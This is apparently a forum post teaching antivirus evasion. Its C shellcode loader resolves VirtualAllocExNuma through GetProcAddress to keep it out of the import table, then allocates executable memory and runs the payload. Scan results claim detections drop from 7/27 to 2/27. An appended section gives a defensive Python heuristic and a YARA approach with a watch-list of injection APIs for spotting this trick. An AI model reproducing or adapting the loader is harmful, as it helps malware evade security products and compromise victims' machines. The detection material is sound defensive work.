Hey guys, here's my follow-up post lel. Today I'm going to show you how to evade analysis using GetProcAddress!
Say, for example, you are trying to load shellcode into memory. Typically you would do it with VirtualAlloc or one of its variants. The issue with this is that most AV products have caught on to these memory allocation calls. Most normal, law-abiding programs will never need to call VirtualAlloc, so if an AV sees a program calling it, it is sure to raise the alarm.
By using GetProcAddress, you can call functions in kernel32.dll without importing them directly, so they never show up in your executable's import table.
For example:
Code:
#include <windows.h>
#include <string.h>

// Function-pointer type matching the real prototype of VirtualAllocExNuma: it returns LPVOID, not int
// (an int return value would truncate the pointer on 64-bit builds)
typedef LPVOID(WINAPI* VirtualAllocProc)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD, DWORD);
// Placeholder bytes from the original post, not real shellcode
unsigned char shellcode[] = "\0xFU\0xCK\0xME";
int main(void){
// Get the address of VirtualAllocExNuma from the already loaded kernel32.dll
VirtualAllocProc VirtualAllocAddr = (VirtualAllocProc)GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAllocExNuma");
if (VirtualAllocAddr == NULL) return 1;
// Call VirtualAllocExNuma through the pointer obtained from GetProcAddress
void* exec = (void*)VirtualAllocAddr(GetCurrentProcess(), NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE, NUMA_NO_PREFERRED_NODE);
if (exec == NULL) return 1;
// Profit
memcpy(exec, shellcode, sizeof(shellcode));
((void(*)())exec)();
return 0;
}
To prove my method, I scanned both of them using https://www.hybrid-analysis.com/, which is a site like VirusTotal that allows you to upload files without having the service spread your methods to the malware analysts!
Standard method (7/27 w/ Signature Detection evaded):
https://www.hybrid-analysis.com/sample/a...15a3a6f278
GetProcAddress method (2/27 w/ Signature Detection evaded):
https://www.hybrid-analysis.com/sample/5...16929c5e6c
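From the detection side, as an added example that is not part of the original post: the trick above only changes the import table. The "VirtualAllocExNuma" string handed to GetProcAddress is still a plaintext C literal in the compiled binary, and the allocation itself still happens at runtime, so hook-based or kernel-side behavioral monitoring sees it no matter how the address was obtained. The Python below is a small static-triage heuristic built on the first point: it looks for watched API names that occur as whole tokens in a binary's bytes but are missing from its import table, which is the fingerprint of runtime resolution. The watch-list, the two byte blobs and their import sets are constructed stand-ins for the two loaders; a real tool would read the import directory with a PE parser such as the pefile library.

```python
import re
from typing import Dict, Iterable, List, Set

# Watch-list of memory-allocation / execution APIs that loaders commonly resolve at
# runtime to keep them out of the import table (constructed for this example)
WATCHED_APIS: List[str] = [
    "VirtualAlloc", "VirtualAllocEx", "VirtualAllocExNuma", "VirtualProtect",
    "WriteProcessMemory", "CreateRemoteThread", "NtAllocateVirtualMemory",
]


def names_in_strings(data: bytes, names: Iterable[str]) -> Set[str]:
    """Return every name from `names` that occurs in `data` as a whole token.

    Names passed to GetProcAddress are NUL-terminated C string literals, so they sit
    in the binary's read-only data untouched unless the author obfuscates them. The
    lookaround guards stop 'VirtualAlloc' from matching inside 'VirtualAllocExNuma'.
    """
    found: Set[str] = set()
    for name in names:
        pattern = (rb"(?<![A-Za-z0-9_])"
                   + re.escape(name.encode("ascii"))
                   + rb"(?![A-Za-z0-9_])")
        if re.search(pattern, data):
            found.add(name)
    return found


def triage(data: bytes, imports: Set[str]) -> Dict[str, object]:
    """Flag a binary whose plaintext strings name watched APIs its import table lacks.

    `imports` is the set of function names from the PE import directory; a real tool
    would read it with a PE parser (pefile, for instance). It is passed in here so
    the example runs with no dependencies.
    """
    present = names_in_strings(data, WATCHED_APIS)
    hidden = sorted(present - imports)
    dynamic = ("GetProcAddress" in imports
               or bool(names_in_strings(data, ["GetProcAddress"])))
    return {
        "hidden_api_strings": hidden,
        "resolves_dynamically": dynamic,
        "suspicious": dynamic and bool(hidden),
    }


# Constructed stand-ins for the relevant slice of each loader's read-only data.
# GetProcAddress loader: both string literals from the call are present, but
# VirtualAllocExNuma is absent from the import table.
SAMPLE_DYNAMIC = b"\x00kernel32.dll\x00VirtualAllocExNuma\x00"
SAMPLE_DYNAMIC_IMPORTS = {"GetProcAddress", "GetModuleHandleA",
                          "GetCurrentProcess", "memcpy"}
# Standard loader: VirtualAlloc appears in the import name table and is imported normally.
SAMPLE_STATIC = b"\x00VirtualAlloc\x00"
SAMPLE_STATIC_IMPORTS = {"VirtualAlloc", "GetCurrentProcess", "memcpy"}


if __name__ == "__main__":
    for label, blob, imps in (("dynamic", SAMPLE_DYNAMIC, SAMPLE_DYNAMIC_IMPORTS),
                              ("static", SAMPLE_STATIC, SAMPLE_STATIC_IMPORTS)):
        print(label, triage(blob, imps))
```

The "standard" sample comes back clean because VirtualAlloc is both in the strings and in the imports, while the GetProcAddress sample is flagged because VirtualAllocExNuma is named but never imported. The same idea is what a YARA rule pairing `pe.imports("kernel32.dll", "GetProcAddress")` with a string match on the API name expresses.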
If you have any questions, feel free to reply!